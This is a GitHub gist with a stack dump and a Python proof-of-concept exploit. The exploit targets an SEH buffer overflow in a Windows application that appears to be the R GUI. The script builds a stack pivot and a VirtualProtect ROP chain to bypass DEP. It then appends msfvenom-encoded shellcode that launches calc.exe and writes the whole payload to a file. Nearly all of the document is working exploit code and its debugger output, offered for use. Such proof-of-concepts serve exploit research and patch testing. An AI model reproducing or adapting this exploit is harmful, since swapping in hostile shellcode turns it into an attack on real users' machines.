@SkyBulk
Last active August 14, 2019 13:26
0141E388 41414141 AAAA `<----------- ESP starts here`
0141E38C 41414141 AAAA
0141E390 41414141 AAAA
0141E394 41414141 AAAA
0141E398 41414141 AAAA
0141E39C 41414141 AAAA
0141E3A0 41414141 AAAA
0141E3A4 41414141 AAAA
0141E3A8 41414141 AAAA
0141E3AC 41414141 AAAA
0141E3B0 41414141 AAAA
0141E3B4 41414141 AAAA
0141E3B8 41414141 AAAA
0141E3BC 41414141 AAAA
0141E3C0 41414141 AAAA
0141E3C4 41414141 AAAA
0141E3C8 41414141 AAAA `<---------- we are here`
0141E3CC 41414141 AAAA
0141E3D0 41414141 AAAA
0141E3D4 41414141 AAAA
0141E3D8 41414141 AAAA
0141E3DC 41414141 AAAA
0141E3E0 41414141 AAAA
0141E3E4 41414141 AAAA
0141E3E8 41414141 AAAA
0141E3EC 41414141 AAAA
0141E3F0 41414141 AAAA
0141E3F4 41414141 AAAA
0141E3F8 41414141 AAAA
0141E3FC 41414141 AAAA
0141E400 41414141 AAAA
0141E404 41414141 AAAA
0141E408 41414141 AAAA
0141E40C 41414141 AAAA
0141E410 41414141 AAAA
0141E414 41414141 AAAA
0141E418 41414141 AAAA
0141E41C 41414141 AAAA
0141E420 41414141 AAAA
0141E424 41414141 AAAA
0141E428 41414141 AAAA
0141E42C 41414141 AAAA
0141E430 41414141 AAAA
0141E434 41414141 AAAA
0141E438 41414141 AAAA
0141E43C 41414141 AAAA
0141E440 41414141 AAAA
0141E444 41414141 AAAA
0141E448 41414141 AAAA
0141E44C 41414141 AAAA
0141E450 41414141 AAAA
0141E454 41414141 AAAA
0141E458 41414141 AAAA
0141E45C 41414141 AAAA
0141E460 41414141 AAAA
0141E464 41414141 AAAA
0141E468 41414141 AAAA
0141E46C 41414141 AAAA
0141E470 41414141 AAAA
0141E474 41414141 AAAA
0141E478 41414141 AAAA
0141E47C 41414141 AAAA
0141E480 41414141 AAAA
0141E484 41414141 AAAA
0141E488 41414141 AAAA
0141E48C 41414141 AAAA
0141E490 41414141 AAAA
0141E494 41414141 AAAA
0141E498 41414141 AAAA
0141E49C 41414141 AAAA
0141E4A0 41414141 AAAA
0141E4A4 41414141 AAAA
0141E4A8 41414141 AAAA
0141E4AC 41414141 AAAA
0141E4B0 41414141 AAAA
0141E4B4 41414141 AAAA
0141E4B8 41414141 AAAA
0141E4BC 41414141 AAAA
0141E4C0 41414141 AAAA
0141E4C4 41414141 AAAA
0141E4C8 41414141 AAAA
0141E4CC 41414141 AAAA
0141E4D0 41414141 AAAA
0141E4D4 41414141 AAAA
0141E4D8 41414141 AAAA
0141E4DC 41414141 AAAA
0141E4E0 41414141 AAAA
0141E4E4 41414141 AAAA
0141E4E8 41414141 AAAA
0141E4EC 41414141 AAAA
0141E4F0 41414141 AAAA
0141E4F4 41414141 AAAA
0141E4F8 41414141 AAAA
0141E4FC 41414141 AAAA
0141E500 41414141 AAAA
0141E504 41414141 AAAA
0141E508 41414141 AAAA
0141E50C 41414141 AAAA
0141E510 41414141 AAAA
0141E514 41414141 AAAA
0141E518 41414141 AAAA
0141E51C 41414141 AAAA
0141E520 41414141 AAAA
0141E524 41414141 AAAA
0141E528 41414141 AAAA
0141E52C 41414141 AAAA
0141E530 41414141 AAAA
0141E534 41414141 AAAA
0141E538 41414141 AAAA
0141E53C 41414141 AAAA
0141E540 41414141 AAAA
0141E544 41414141 AAAA
0141E548 41414141 AAAA
0141E54C 41414141 AAAA
0141E550 41414141 AAAA
0141E554 41414141 AAAA
0141E558 41414141 AAAA
0141E55C 41414141 AAAA
0141E560 41414141 AAAA
0141E564 41414141 AAAA
0141E568 41414141 AAAA
0141E56C 41414141 AAAA
0141E570 41414141 AAAA
0141E574 41414141 AAAA
0141E578 41414141 AAAA
0141E57C 41414141 AAAA
0141E580 41414141 AAAA
0141E584 41414141 AAAA
0141E588 41414141 AAAA
0141E58C 41414141 AAAA
0141E590 41414141 AAAA
0141E594 41414141 AAAA
0141E598 41414141 AAAA
0141E59C 41414141 AAAA
0141E5A0 41414141 AAAA
0141E5A4 41414141 AAAA
0141E5A8 41414141 AAAA
0141E5AC 41414141 AAAA
0141E5B0 41414141 AAAA
0141E5B4 41414141 AAAA
0141E5B8 41414141 AAAA
0141E5BC 41414141 AAAA
0141E5C0 41414141 AAAA
0141E5C4 41414141 AAAA
0141E5C8 41414141 AAAA
0141E5CC 41414141 AAAA
0141E5D0 41414141 AAAA
0141E5D4 41414141 AAAA
0141E5D8 41414141 AAAA
0141E5DC 41414141 AAAA
0141E5E0 41414141 AAAA
0141E5E4 41414141 AAAA
0141E5E8 41414141 AAAA
0141E5EC 41414141 AAAA
0141E5F0 41414141 AAAA
0141E5F4 41414141 AAAA
0141E5F8 41414141 AAAA
0141E5FC 41414141 AAAA
0141E600 41414141 AAAA
0141E604 41414141 AAAA
0141E608 41414141 AAAA
0141E60C 41414141 AAAA
0141E610 41414141 AAAA
0141E614 41414141 AAAA
0141E618 41414141 AAAA
0141E61C 41414141 AAAA
0141E620 41414141 AAAA
0141E624 41414141 AAAA
0141E628 41414141 AAAA
0141E62C 41414141 AAAA
0141E630 41414141 AAAA
0141E634 41414141 AAAA
0141E638 41414141 AAAA
0141E63C 41414141 AAAA
0141E640 41414141 AAAA
0141E644 41414141 AAAA
0141E648 41414141 AAAA
0141E64C 41414141 AAAA
0141E650 41414141 AAAA
0141E654 41414141 AAAA
0141E658 41414141 AAAA
0141E65C 41414141 AAAA
0141E660 41414141 AAAA
0141E664 41414141 AAAA
0141E668 41414141 AAAA
0141E66C 41414141 AAAA
0141E670 41414141 AAAA
0141E674 41414141 AAAA
0141E678 41414141 AAAA
0141E67C 41414141 AAAA
0141E680 41414141 AAAA
0141E684 41414141 AAAA
0141E688 41414141 AAAA
0141E68C 41414141 AAAA
0141E690 41414141 AAAA
0141E694 41414141 AAAA
0141E698 41414141 AAAA
0141E69C 41414141 AAAA
0141E6A0 41414141 AAAA
0141E6A4 41414141 AAAA
0141E6A8 41414141 AAAA
0141E6AC 41414141 AAAA
0141E6B0 41414141 AAAA
0141E6B4 41414141 AAAA
0141E6B8 41414141 AAAA
0141E6BC 41414141 AAAA
0141E6C0 41414141 AAAA
0141E6C4 41414141 AAAA
0141E6C8 41414141 AAAA
0141E6CC 41414141 AAAA
0141E6D0 41414141 AAAA
0141E6D4 41414141 AAAA
0141E6D8 41414141 AAAA
0141E6DC 41414141 AAAA
0141E6E0 41414141 AAAA
0141E6E4 41414141 AAAA
0141E6E8 41414141 AAAA
0141E6EC 41414141 AAAA
0141E6F0 41414141 AAAA
0141E6F4 41414141 AAAA
0141E6F8 41414141 AAAA
0141E6FC 41414141 AAAA
0141E700 41414141 AAAA
0141E704 41414141 AAAA
0141E708 41414141 AAAA
0141E70C 41414141 AAAA
0141E710 41414141 AAAA
0141E714 41414141 AAAA
0141E718 41414141 AAAA
0141E71C 41414141 AAAA
0141E720 41414141 AAAA
0141E724 41414141 AAAA
0141E728 41414141 AAAA
0141E72C 41414141 AAAA
0141E730 41414141 AAAA
0141E734 41414141 AAAA
0141E738 41414141 AAAA
0141E73C 41414141 AAAA
0141E740 41414141 AAAA
0141E744 41414141 AAAA
0141E748 41414141 AAAA
0141E74C 41414141 AAAA
0141E750 41414141 AAAA
0141E754 41414141 AAAA
0141E758 41414141 AAAA
0141E75C 41414141 AAAA
0141E760 41414141 AAAA
0141E764 41414141 AAAA
0141E768 41414141 AAAA
0141E76C 41414141 AAAA
0141E770 41414141 AAAA
0141E774 41414141 AAAA
0141E778 41414141 AAAA
0141E77C 42424242 BBBB Pointer to next SEH record `<------ NSEH`
0141E780 6C90B9C8 ȹl SE handler `<------- stack pivot 0x6c90b9c8 : {pivot 1916 / 0x77c} : # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}`
0141E784 6C998F58 X™l R.6C998F58 `<--------- starts our ROP chain`
0141E788 6379973C <—yc <&KERNEL32.VirtualProtect>
0141E78C 6FEE2984 „)îo grDevice.6FEE2984
0141E790 6CA1BA76 vº¡l R.6CA1BA76
0141E794 64C45CB8 ¸\Äd methods.64C45CB8
0141E798 64C46010 `Äd methods.64C46010
0141E79C 6CACC7E2 âǬl R.6CACC7E2
0141E7A0 FFFFFFC0 Àÿÿÿ
0141E7A4 7139C7BA ºÇ9q stats.7139C7BA
0141E7A8 6CA3485A ZH£l R.6CA3485A
0141E7AC 7135A862 b¨5q stats.7135A862
0141E7B0 FFFFFDFF ÿýÿÿ
0141E7B4 6E7D41CA ÊA}n utils.6E7D41CA
0141E7B8 63742597 —%tc Rgraphap.63742597
0141E7BC 6CBEF3C0 Àó¾l R.6CBEF3C0
0141E7C0 41414141 AAAA
0141E7C4 6C9B1DE7 ç›l R.6C9B1DE7
0141E7C8 6CA2A9BD ½©¢l R.6CA2A9BD
0141E7CC 6CBEBFA6 ¦¿¾l R.6CBEBFA6
0141E7D0 90909090 
0141E7D4 6CA00E93 “ l R.6CA00E93
0141E7D8 6375FE5C \þuc Rgraphap.6375FE5C
0141E7DC 6FF1B7BB »·ño grDevice.6FF1B7BB
0141E7E0 90909090 
0141E7E4 90909090 
0141E7E8 90909090 
0141E7EC 90909090 
0141E7F0 90909090 
0141E7F4 90BFCEDB Ûο `<-------- starts our shellcode `
PoC — Python 2 script that builds the payload shown in the dump above and writes it to `payload.txt` in the current working directory
#!/usr/bin/python
import struct
import sys
# Where the generated payload is written (relative to the working directory).
outfile = "payload.txt"
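def create_rop_chain():
    """Return the VirtualProtect ROP chain as a little-endian byte string.

    The chain follows the usual mona.py "PUSHAD" layout: it loads the
    registers that PUSHAD will spill onto the stack so that, after the final
    RETN, the stack looks like a VirtualProtect call frame whose return
    address is a JMP ESP.  Reading the register loads below together with
    the x86 PUSHAD order (EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI) gives,
    from the new stack top downwards:

        EDI = RETN (ROP NOP)       -> first thing popped after PUSHAD
        ESI = VirtualProtect       -> the real address, read through the IAT slot
        EBP = JMP ESP              -> return address of the call
        ESP = (value at PUSHAD)    -> lpAddress, i.e. the current stack page
        EBX = 0x201                -> dwSize
        EDX = 0x40                 -> flNewProtect (PAGE_EXECUTE_READWRITE)
        ECX = writable slot        -> lpflOldProtect
        EAX = 0x90909090           -> unused

    0x40 and 0x201 are loaded as their two's-complement negatives and fixed
    up with NEG EAX, presumably to keep NUL bytes out of the chain (the
    msfvenom line in the script excludes 0x00).

    Every entry is an absolute pointer into the DLL builds named in the
    comments (R.dll, methods.dll, stats.dll, utils.dll, Rgraphapp.dll,
    grDevices.dll).  Nothing here is computed at run time, so the chain only
    works against those exact module versions at those exact load addresses;
    a rebased or updated module breaks it silently.

    Returns:
        bytes on Python 3 (str on Python 2): 23 packed 32-bit values, 92 bytes.
    """
    rop_gadgets = [
        0x6c998f58,  # POP EAX # RETN [R.dll]
        0x6379973c,  # ptr to &VirtualProtect() [IAT methods.dll]
        0x6fee2984,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll]
        0x6ca1ba76,  # XCHG EAX,ESI # RETN [R.dll]
        0x64c45cb8,  # POP ECX # RETN ** [methods.dll] ** | {PAGE_EXECUTE_READ}
        0x64c46010,  # &Writable location [methods.dll]
        0x6cacc7e2,  # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x7139c7ba,  # NEG EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
        0x6ca3485a,  # XCHG EAX,EDX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
        0x7135a862,  # POP EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
        0xfffffdff,  # Value to negate, will become 0x00000201
        0x6e7d41ca,  # NEG EAX # RETN ** [utils.dll] ** | {PAGE_EXECUTE_READ}
        0x63742597,  # XCHG EAX,EBX # RETN ** [Rgraphapp.dll] ** | {PAGE_EXECUTE_READ}
        # This POP EAX / filler pair is redundant (EAX is reloaded three
        # entries later); it is mona's "compensate" filler and is kept so
        # the offsets match the stack dump above.
        0x6cbef3c0,  # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
        0x41414141,  # Filler (compensate)
        0x6c9b1de7,  # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
        0x6ca2a9bd,  # & jmp esp [R.dll]
        0x6cbebfa6,  # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
        0x90909090,  # nop
        0x6ca00e93,  # POP EDI # RETN [R.dll]
        0x6375fe5c,  # RETN (ROP NOP) [Rgraphapp.dll]
        0x6ff1b7bb,  # PUSHAD # RETN [grDevices.dll]
    ]
    pack_dword = struct.Struct('<I').pack
    # b'' rather than '': struct.pack returns bytes on Python 3, where a
    # plain ''.join(...) raises TypeError; on Python 2 b'' is just ''.
    return b''.join(pack_dword(gadget) for gadget in rop_gadgets)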
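rop_chain = create_rop_chain()

# All pieces are byte strings (b"...") so the file is assembled identically
# on Python 2 (where b"" is str) and Python 3 (where struct.pack and the
# binary file handle below need bytes).

# Offset to the SEH record for this target: 1012 bytes of filler, then the
# nSEH slot, then the handler slot.
junk = b"A" * 1012

# nSEH is never executed by this chain: the handler below is a stack pivot
# that moves ESP straight onto the ROP chain, so this slot is only a "BBBB"
# marker.  (0x42424242 is not a short jump, whatever the old comment said.)
nseh = struct.pack("<L", 0x42424242)

# SE handler = stack pivot
# 0x6c90b9c8 : {pivot 1916 / 0x77c} : # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
# Hard-coded for that exact R.dll build; a different version or a rebased
# load address breaks the pivot before any of the ROP chain runs.
seh = struct.pack("<L", 0x6c90b9c8)

# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x09\x0a\x0d' cmd=calc.exe exitfunc=thread -f python
# The JMP ESP at the end of the ROP chain lands in this NOP sled.
nops = b"\x90" * 20
shellcode = b""
shellcode += b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += b"\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += b"\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += b"\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += b"\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += b"\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += b"\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += b"\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += b"\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += b"\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += b"\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += b"\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += b"\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += b"\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += b"\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += b"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += b"\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

# NOTE(review): this formula does not subtract len(rop_chain) (92) or
# len(nops) (20), so the file is 8112 bytes, not 8000.  Kept as-is because
# the crash length the target expects is not shown here; adjust if the
# target needs exactly 8000 bytes.
padding = b"D" * (8000 - 1012 - 4 - 4 - len(shellcode))
payload = junk + nseh + seh + rop_chain + nops + shellcode + padding

# Bytes the shellcode was, per the msfvenom line above, encoded to avoid.
# Nothing else in the payload (pivot, nSEH, ROP chain) went through an
# encoder, so check the whole buffer.  Warn rather than abort: the embedded
# blob itself already contains 0x09 twice (its first and sixth lines), so
# either that bad-char list is stale or 0x09 is tolerated by the target.
bad_chars = set(bytearray(b"\x00\x09\x0a\x0d"))
hits = sorted(set(bytearray(payload)) & bad_chars)
if hits:
    sys.stderr.write("WARNING: payload contains listed bad byte(s): %s\n"
                     % ", ".join("0x%02x" % b for b in hits))

# Binary mode: the payload is raw bytes.  Text mode on Windows rewrites any
# 0x0a as 0x0d 0x0a, and Python 3 refuses to write bytes to a text handle.
with open(outfile, 'wb') as fh:
    fh.write(payload)
print("txt payload File Created\n")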